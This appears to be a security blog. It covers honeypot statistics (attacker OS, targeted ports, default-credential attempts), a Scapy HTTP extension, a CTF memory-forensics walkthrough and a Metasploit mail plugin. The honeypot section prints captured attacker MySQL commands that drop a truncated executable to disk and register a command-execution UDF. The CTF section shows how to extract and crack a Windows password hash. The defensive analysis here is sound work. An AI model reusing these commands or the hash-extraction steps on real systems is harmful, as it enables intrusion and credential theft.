Some stats of my dionaea honeypot

Last month, my PC was running Dionaea honeypot during two periods of some days. So I decided to share some statistics about the attacked services, localization of the attacker, OS of the attacker ...
I have also list SQL requests used to get these informations.


P0f informations

P0f is a passive OS fingerprinting tool which will analyze network traffic to get informations like operating system version, firewall presence, NAT use, distance to the remote host and also about the kind of link used.
FYI : You need to enable p0f in dionaea configuration file and run p0f tool in order to have these datas.

select count(p0f_genre||p0f_detail) as count, (p0f_genre || " " || p0f_detail) as OS from p0fs group by (p0f_genre||p0f_detail) order by count desc; 

count	OS
7509
104	Windows 2000 SP4, XP SP1+
46	Windows XP/2000 (RFC1323+, w+, tstamp-)
31	Windows 2000 SP2+, XP SP1+ (seldom 98)
17	Linux 2.6 (newer, 3)
11	Linux 2.6 (newer, 2)
8	Windows XP SP1+, 2000 SP3
7	Linux 2.4-2.6
6	Windows XP/2000 (RFC1323+, w, tstamp+)
3	Windows 95
2	SunOS 4.1.x
1	Linux 2.6? (barebone, rare!)
1	Windows 98 (no sack)

select count(p0f_link) as count, p0f_link as link from p0fs group by p0f_link order by count desc;

count	link
6051
1533	ethernet/modem
101	pppoe (DSL)
39	IPv6/IPIP
10	(Google/AOL)
5	GPRS, T1, FreeS/WAN
3	PIX, SMC, sometimes wireless
3	sometimes DSL (2)
1	vtun

Targeted local port

select count(local_port) as count, local_port as "targeted port" from connections group by local_port order by count desc;

count	targeted port
1201	42
335	80
123	135
113	1433
87	32554
72	32045
61	5060
38	3389
38	8008
37	23
...
18	445
...

Services most targeted here are WINS, Web servers, Epmap/DCOM, SQL Server, Sip, RDP, Telnet.


Location of attackers / malware sources

select count(remote_host) as count, remote_host from connections group by remote_host order by count desc;

If we look at the map, we can see lot of connections from France. But I can explain some of them, because when my honeypot was running, I have launched some ports scan. In order to have reliable statistics, I have removed of the sqlite database connections coming from my IP but I think I've omitted some of them.


Protocol informations

select count(connection_transport) as count, connection_transport from connections group by connection_transport order by count desc;

count	connection_transport
6959	tcp
85	udp
13	tls

select count(connection_protocol) as count, connection_protocol from connections group by connection_protocol order by count desc;

count	connection_protocol
3929	pcap
1204	mirrorc
1201	mirrord
335	httpd
123	epmapper
113	mssqld
70	SipSession
54	TftpClient
17	smbd
7	mysqld
4	SipCall

Default passwords

select count(logins.login_username||logins.login_password) as count, logins.login_username, logins.login_password, connections.connection_protocol, connections.local_port from logins, connections where connections.connection = logins.connection group by (logins.login_username||logins.login_password) order by count desc;

count	login_username	login_password	connection_protocol	local_port
95	sa		mssqld	1433
6	root		mysqld	3306

Malwares targeting my honeypot have tried to connect to MySQL with root/ and to Microsoft SQL Server with sa/ which are both default credentials.

MySQL requests

select * from mysql_command_args;

Look output of this request is quite fun :

drop function cmdshell
drop function cmdshell
drop function my_udfdoor
drop function my_udfdoor
drop function do_system
drop function do_system
use mysql;
use mysql;
drop table if exists tempMix4;
drop table if exists tempMix4;
create table if not exists tempMix4(data LONGBLOB);
create table if not exists tempMix4(data LONGBLOB);
set @a = concat('',0x4D5A90000300000004000000FFFF .....00000000000000);
set @a = concat('',0x4D5A90000300000004000000FFFF .....00000000000000);
INSERT INTO tempMix4 VALUES (@a);
select data from tempMix4 into DUMPFILE 'C:\\12345.exe';
drop table if exists tempMix4;
use mysql;
drop table if exists tempMix;
create table if not exists tempMix(data LONGBLOB);
set @a = concat('',0x4D5A90000300000004000000FFFF .....00000000000000);
INSERT INTO tempMix VALUES (@a);
select data from tempMix into DUMPFILE 'C:\\WINDOWS\\amd.dll'
INSERT INTO tempMix4 VALUES (@a);
select data from tempMix into DUMPFILE 'C:\\WINT\\amd.dll'
select data from tempMix4 into DUMPFILE 'C:\\12345.exe';
select data from tempMix into DUMPFILE 'C:\\WINDOWS\\SYSTEM32\\amd.dll'
select data from tempMix into DUMPFILE 'C:\\WINT\\amd.dll'
select data from tempMix into DUMPFILE '..\\lib\\plugin\\amd.dll'
drop table if exists tempMix4;
select data from tempMix into DUMPFILE 'D:\\amd.dll'
use mysql;
select data from tempMix into DUMPFILE '..\\bin\\amd.dll'
drop table if exists tempMix;
create table if not exists tempMix(data LONGBLOB);
create function cmdshelv returns string soname 'amd.dll';
create function cmdshelv returns string soname 'amd.dll'
create function cmdshelv returns string soname 'C:\\WINDOWS\\system32\\amd.dll'
create function cmdshelv returns string soname 'C:\\WINNT\\amd.dll'
create function cmdshelv returns string soname 'C:\\WINDOWS\\SYSTEM32\\amd.dll';
create function cmdshelv returns string soname 'C:\\WINNT\\amd.dll';
create function cmdshelv returns string soname 'amd.dll'
select cmdshelv('c:\\12345.exe')
select cmdshelv('c:\\12345.exe');
set @a = concat('',0x4D5A90000300000004000000FFFF .....00000000000000);
select cmdshelv('cmd.exe cmd/c del c:\12345.exe');

For more informations, you can read this article : http://carnivore.it/2011/06/12/the_mysql_cmdshelv

RPC vulnerabilities

select dcerpcservices.dcerpcservice_name, dcerpcserviceops.dcerpcserviceop_name, dcerpcserviceops.dcerpcserviceop_vuln from dcerpcservices, dcerpcserviceops where dcerpcservices.dcerpcservice = dcerpcserviceops.dcerpcservice and dcerpcserviceop_vuln is not "";

dcerpcservice_name	dcerpcserviceop_name	dcerpcserviceop_vuln
DCOM	RemoteActivation	MS03-26
DSSETUP	DsRolerUpgradeDownlevelServer	MS04-11
ISystemActivator	RemoteCreateInstance	MS04-12
MSMQ	QMCreateObjectInternal	MS07-065
MSMQ	QMDeleteObject	MS05-017
NWWKS	NwChangePassword	MS06-66
NWWKS	NwOpenEnumNdsSubTrees	MS06-66
PNP	PNP_QueryResConfList	MS05-39
SRVSVC	NetPathCanonicalize	MS08-67
SRVSVC	NetPathCompare	MS08-67
WKSSVC	NetAddAlternateComputerName	MS03-39
nddeapi	NDdeSetTrustedShareW	MS04-031

Malware URLs

select downloads.download_url, downloads.download_md5_hash,connections.local_port from downloads, connections where downloads.connection=connections.connection;

All malwares have been downloaded on TFTP servers and are link to connections with port 135. As URLs are pointing to malwares, I won't show them here.

Virustotal reports

select virustotal_permalink from virustotals;

http://www.virustotal.com/file-scan/report.html?id=1a934b461b5c40172958415928b23ae6b75bf194ecb1927ce09c30b765f09d92-1312716887
http://www.virustotal.com/file-scan/report.html?id=badf757dbbcb192bceb0ac9e2c949dfbe3d2a1022a6017ab3be611053f6412ef-1299403039
http://www.virustotal.com/file-scan/report.html?id=cdcfa06de82598a06d3eba5259306a5caccfbf0265625ad65de8de2620e17131-1312716944
http://www.virustotal.com/file-scan/report.html?id=4f226d64e7083b0cb7e36076edd76520498e95cb24380bbd469b13e46096b7ad-1312716946
http://www.virustotal.com/file-scan/report.html?id=273040d07e3d2c1153967015fa069de7e3086163651babcc07ab321b289d70d5-1314124477
http://www.virustotal.com/file-scan/report.html?id=922a7d3c82c4782f9795a82271df3be8628eefa6a0fa104caad7472772f5e43e-1312713825
http://www.virustotal.com/file-scan/report.html?id=ec9b2bf6a6fdb2aa5b699ea897925e2e3b152aecc6db28c47992607871a50c28-1312713850
http://www.virustotal.com/file-scan/report.html?id=dc64e5eb25f14b17b415a1c73523e0825d6f79a8b0f47194c097028d1dc93003-1310608851
http://www.virustotal.com/file-scan/report.html?id=9f932547a0f1050fcc06513b1701d817c201904820b710daa2d8907e19383b6a-1307217666
http://www.virustotal.com/file-scan/report.html?id=878949d20c4c07cbe21e96f24d77e8c3387e8fc65e60250138ab94ee5d3fb561-1312713864
http://www.virustotal.com/file-scan/report.html?id=137d09a12f04cfee5dbd0e98422a127f8ca7bc1d26c118be067251a456afecdc-1314040714
http://www.virustotal.com/file-scan/report.html?id=83c334585c33b1996697cc0ff5f7b131b065628c2dc6f4c81a0ea9e1a341baf7-1310796380

All these URLs are Virustotal report of malwares capturated by my honeypot. Most of them have been submitted to Virustotal this summer. According reports, they are all IRC bots. As detection rate is high (between 93% and 98%), they are not an important threat for our computer as long as user is not stupid.

HTTP support in Scapy

"Scapy is a powerful interactive packet manipulation program. It is able to forge or decode packets of a wide number of protocols, send them on the wire, capture them, match requests and replies, and much more. It can easily handle most classical tasks like scanning, tracerouting, probing, unit tests, attacks or network discovery (it can replace hping, 85% of nmap, arpspoof, arp-sk, arping, tcpdump, tethereal, p0f, etc.)." http://www.secdev.org/projects/scapy/

Scapy's documentation is very interesting to learn how to use it and how to add new protocols. To become more familiar with this great tool, I've decided to try to implement one of the most used protocol : HTTP (RFC 2616).

steeve-pc:blog steeve$ ./HTTP.py
Welcome to Scapy (2.2.0)
HTTP Scapy extension
>>> test=rdpcap("HTTP.pcap")
>>> test.summary()
Ether / IP / TCP 145.254.160.237:tip2 > 65.208.228.223:http S
Ether / IP / TCP 65.208.228.223:http > 145.254.160.237:tip2 SA
Ether / IP / TCP 145.254.160.237:tip2 > 65.208.228.223:http A
Ether / IP / TCP 145.254.160.237:tip2 > 65.208.228.223:http PA / HTTP / HTTPrequest / Raw
Ether / IP / TCP 65.208.228.223:http > 145.254.160.237:tip2 A
Ether / IP / TCP 65.208.228.223:http > 145.254.160.237:tip2 A / HTTP / HTTPresponse / Raw
Ether / IP / TCP 145.254.160.237:tip2 > 65.208.228.223:http A
Ether / IP / TCP 65.208.228.223:http > 145.254.160.237:tip2 A / HTTP / Raw
Ether / IP / TCP 145.254.160.237:tip2 > 65.208.228.223:http A
Ether / IP / TCP 65.208.228.223:http > 145.254.160.237:tip2 A / HTTP / Raw
Ether / IP / TCP 65.208.228.223:http > 145.254.160.237:tip2 PA / HTTP / Raw
Ether / IP / TCP 145.254.160.237:tip2 > 65.208.228.223:http A
[...]

The function summary() shows the content of each packet and here we can see that we have packets with interesting layers : HTTP, HTTPrequest and HTTPresponse. HTTP layer contains all the fields that can be in the 2 other layers like Date or Connection fields. HTTPrequest layer corresponds to HTTP request (GET, POST, TRACE, HEAD ...) and HTTPresponse to "200 OK", "404 Not Found"... webpages.

We can see the content of the paquet containing the HTTPrequest layer :

>>> test[3].show()
###[ Ethernet ]###
  dst= fe:ff:20:00:01:00
  src= 00:00:01:00:00:00
  type= 0x800
###[ IP ]###
     version= 4L
     ihl= 5L
     tos= 0x0
     len= 519
     id= 3909
     flags= DF
     frag= 0L
     ttl= 128
     proto= tcp
     chksum= 0x9010
     src= 145.254.160.237
     dst= 65.208.228.223
     \options\
###[ TCP ]###
        sport= tip2
        dport= http
        seq= 951057940
        ack= 290218380
        dataofs= 5L
        reserved= 0L
        flags= PA
        window= 9660
        chksum= 0xa958
        urgptr= 0
        options= []
###[ HTTP ]###
           CacheControl= None
           Connection= 'Connection: keep-alive\r\n'
           Date= None
           Pragma= None
           Trailer= None
           TransferEncoding= None
           Upgrade= None
           Via= None
           Warning= None
           KeepAlive= 'Keep-Alive: 300\r\n'
           Allow= None
           ContentEncoding= None
           ContentLanguage= None
           ContentLength= None
           ContentLocation= None
           ContentMD5= None
           ContentRange= None
           ContentType= None
           Expires= None
           LastModified= None
###[ HTTP Request ]###
              Method= 'GET /download.html HTTP/1.1\r\n'
              Host= 'Host: www.ethereal.com\r\n'
              UserAgent= 'User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.6) Gecko/20040113\r\n'
              Accept= 'Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1\r\n'
              AcceptLanguage= 'Accept-Language: en-us,en;q=0.5\r\n'
              AcceptEncoding= 'Accept-Encoding: gzip,deflate\r\n'
              AcceptCharset= 'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n'
              Referer= 'Referer: http://www.ethereal.com/development.html\r\n'
              Authorization= None
              Expect= None
              From= None
              IfMatch= None
              IfModifiedSince= None
              IfNoneMatch= None
              IfRange= None
              IfUnmodifiedSince= None
              MaxForwards= None
              ProxyAuthorization= None
              Range= None
              TE= None
###[ Raw ]###
                 load= '\r\n'

Now we can easily manipulate HTTP packets with Scapy. Here, I will filter packets with HTTPrequest or HTTPresponse layer and then print some fields :

>>> http=test.filter(lambda(s): HTTPrequest in s or HTTPresponse in s)
>>> http.summary()
Ether / IP / TCP 145.254.160.237:tip2 > 65.208.228.223:http PA / HTTP / HTTPrequest / Raw
Ether / IP / TCP 65.208.228.223:http > 145.254.160.237:tip2 A / HTTP / HTTPresponse / Raw
Ether / IP / TCP 145.254.160.237:3371 > 216.239.59.99:http PA / HTTP / HTTPrequest / Raw
Ether / IP / TCP 216.239.59.99:http > 145.254.160.237:3371 PA / HTTP / HTTPresponse / Raw
Ether / IP / TCP 216.239.59.99:http > 145.254.160.237:3371 PA / HTTP / HTTPresponse / Raw
>>> for p in http.filter(lambda(s): HTTPrequest in s):
...     print p.Method, p.Host
...
GET /download.html HTTP/1.1
Host: www.ethereal.com
GET /pagead/ads?client=ca-pub-2309191948673629&random=1084443430285&lmt=1082467020&format=468x60_as&output=html&url=http%3A%2F%2Fwww.ethereal.com%2Fdownload.html&color_bg=FFFFFF&color_text=333333&color_link=000000&color_url=666633&color_border=666633 HTTP/1.1
Host: pagead2.googlesyndication.com
>>> for p in http.filter(lambda(s): HTTPresponse in s):
...     print p.StatusLine, p.Server
...
HTTP/1.1 200 OK
Server: Apache
HTTP/1.1 200 OK
Server: CAFE/1.0
HTTP/1.1 200 OK
Server: CAFE/1.0
>>> 

My script can be downloaded here. Don't hesitate to give me your opinion or to improve my script ;) 

Get password from memory dump

To explain how we can get password from memory dump, I will use forensic challenge #2 from "Nuit du Hack 2010" as example.
Aim : extract Administrator password from the Windows XP memory dump

We will use a great tool to extract this password which is : Volatility. Volatility has a plugin called "hashdump" to extract password hashes. So we have to use it, but before we have to locate virtual address of SYSTEM and SAM hive.

Find physical adresses of registry hives (hivescan plugin) :

user@ubuntu-vm:~/Desktop/volatility$ python volatility.py -f ../xp_forensics.vmem --profile=WinXPSP3x86 hivescan
Volatile Systems Volatility Framework 1.4_rc1
Offset          (hex)        
44666888        0x02a99008
44694368        0x02a9fb60
[...]
380343784       0x16ab95e8
424820744       0x19524008

Then locate virtual addresses (hivelist plugin) :

user@ubuntu-vm:~/Desktop/volatility$ python volatility.py -f ../xp_forensics.vmem --profile=WinXPSP3x86 hivelist
Volatile Systems Volatility Framework 1.4_rc1
Virtual     Physical    Name
0xe1cf9008  0x19524008  \??\C:\Documents and Settings\mr_esclave\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
[...]
0xe15fdb60  0x0688ab60  \Device\HarddiskVolume1\WINDOWS\system32\config\software
0xe15ebb60  0x06708b60  \Device\HarddiskVolume1\WINDOWS\system32\config\default
0xe15fd008  0x0688a008  \Device\HarddiskVolume1\WINDOWS\system32\config\SECURITY
0xe15f2658  0x066cf658  \Device\HarddiskVolume1\WINDOWS\system32\config\SAM
0xe12eb288  0x02d58288  [no name]
0xe1035b60  0x02a9fb60  \Device\HarddiskVolume1\WINDOWS\system32\config\system
0xe102e008  0x02a99008  [no name]
0x8066e904  0x0066e904  [no name]

Now we have SYSTEM and SAM virtual addresses, so we can run hashdump plugin :

user@ubuntu-vm:~/Desktop/volatility$ python volatility.py -f ../xp_forensics.vmem --profile=WinXPSP3x86 hashdump -y 0xe1035b60 -s 0xe15f2658
Volatile Systems Volatility Framework 1.4_rc1
Administrateur:500:a94c6377a507e293d87f0f06a65161cd:ca5cf9cfc07ec43a78d00bc936242594:::

Last step is to use ophcrack with rainbow tables to crack this password :

We have easily got Administrator's password which is "cuirmoustache".


Nuit du Hack challenges : http://wargame.nuitduhack.com/
Volatility plugin list : http://code.google.com/p/volatility/wiki/CommandReference

Use Metasploit as email client

This metasploit plugin is my first piece of Ruby code and is a very basic email client. With this plugin you can send emails (by smtp), and receive unread mails by imap. Download my metasploit plugin.

Send mails :

msf > load mail_client
[*] Mail Client plugin loaded.
[*] Successfully loaded plugin: MailClient
msf > send_mail
Enter your smtp password :
Use ';' for multiple recipients
To : email@mail.com
Subject : Test metasploit plugin
Message :
Is my plugin working ?? We will see ...

Send ...
msf >


Get mails :

msf > get_mails

0. Sun, 27 Feb 2011 00:11:58 +0000 - Test metasploit plugin
? read 0
Is my plugin working ?? We will see ...

Sent from Metasploit
----------
? help
read X
list
help
exit
?

This plugin uses basic Net::IMAP from Ruby, so authentication is limited to "LOGIN" and "CRAM-MD5" authentication mechanisms. I have not added OAUTH used by Gmail or others kinds of "high level" authentication methods.